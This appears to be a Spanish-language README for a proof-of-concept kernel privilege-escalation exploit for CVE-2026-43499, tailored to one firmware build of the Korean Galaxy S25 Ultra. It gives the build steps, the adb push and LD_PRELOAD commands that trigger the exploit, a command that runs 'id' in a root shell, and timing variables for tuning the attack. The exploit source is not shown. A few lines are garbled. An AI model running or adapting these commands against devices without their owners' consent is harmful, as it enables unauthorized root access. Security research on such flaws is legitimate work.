
Independiente CVE-2026-43499 PoC para Galaxy S25 Ultra SM-S938N S938NKSUACZF1
Prueba de concepto específica del dispositivo para CVE-2026-43499 en el Samsung Galaxy S25 Ultra coreano.
Model: SM-S938N
Codename: pa3q
Android: 16 / API 36
Build: S938NKSUACZF1
Display ID: BP4A.251205.006.S938NKSUACZF1
Fingerprint: samsung/pa3qksx/pa3q:16/BP4A.251205.006/S938NKSUACZF1_OKRACZF1:user/release-keys
Kernel: 6.6.98-android15-8-pd6ff1cd-abogkiS938NKSUACZF1-4k
Architecture: arm64 / 4K pages
Los desplazamientos y diseños de estructura solo son válidos para el firmware anterior.
Este puerto se basa en:
b850d3bddc74c3328d5fbcc0568d21962b55d949La licencia Apache 2.0 original se conserva en LICENSE.
pa3q-S938NKSUACZF1.system_unbound_wq específica del dispositivo.Establezca ANDROID_NDK_HOME en Android NDK r29 o un conjunto de herramientas compatible:
make -j8
Salidas:
build/cve-2026-43499
build/cve-2026-43499-root
adb push build/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"
El exploit tiene por defecto 16 intentos independientes y un retardo base pselect de 20,000 microsegundos. Sobrescríbalos al recopilar datos de temporización:
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
La sesión raíz temporal y las asignaciones retenidas duran hasta el reinicio.
Para instalación con un clic y soporte KernelSU, use Root My Galaxy.
Úselo solo en dispositivos que posea o para los que tenga autorización explícita para realizar pruebas.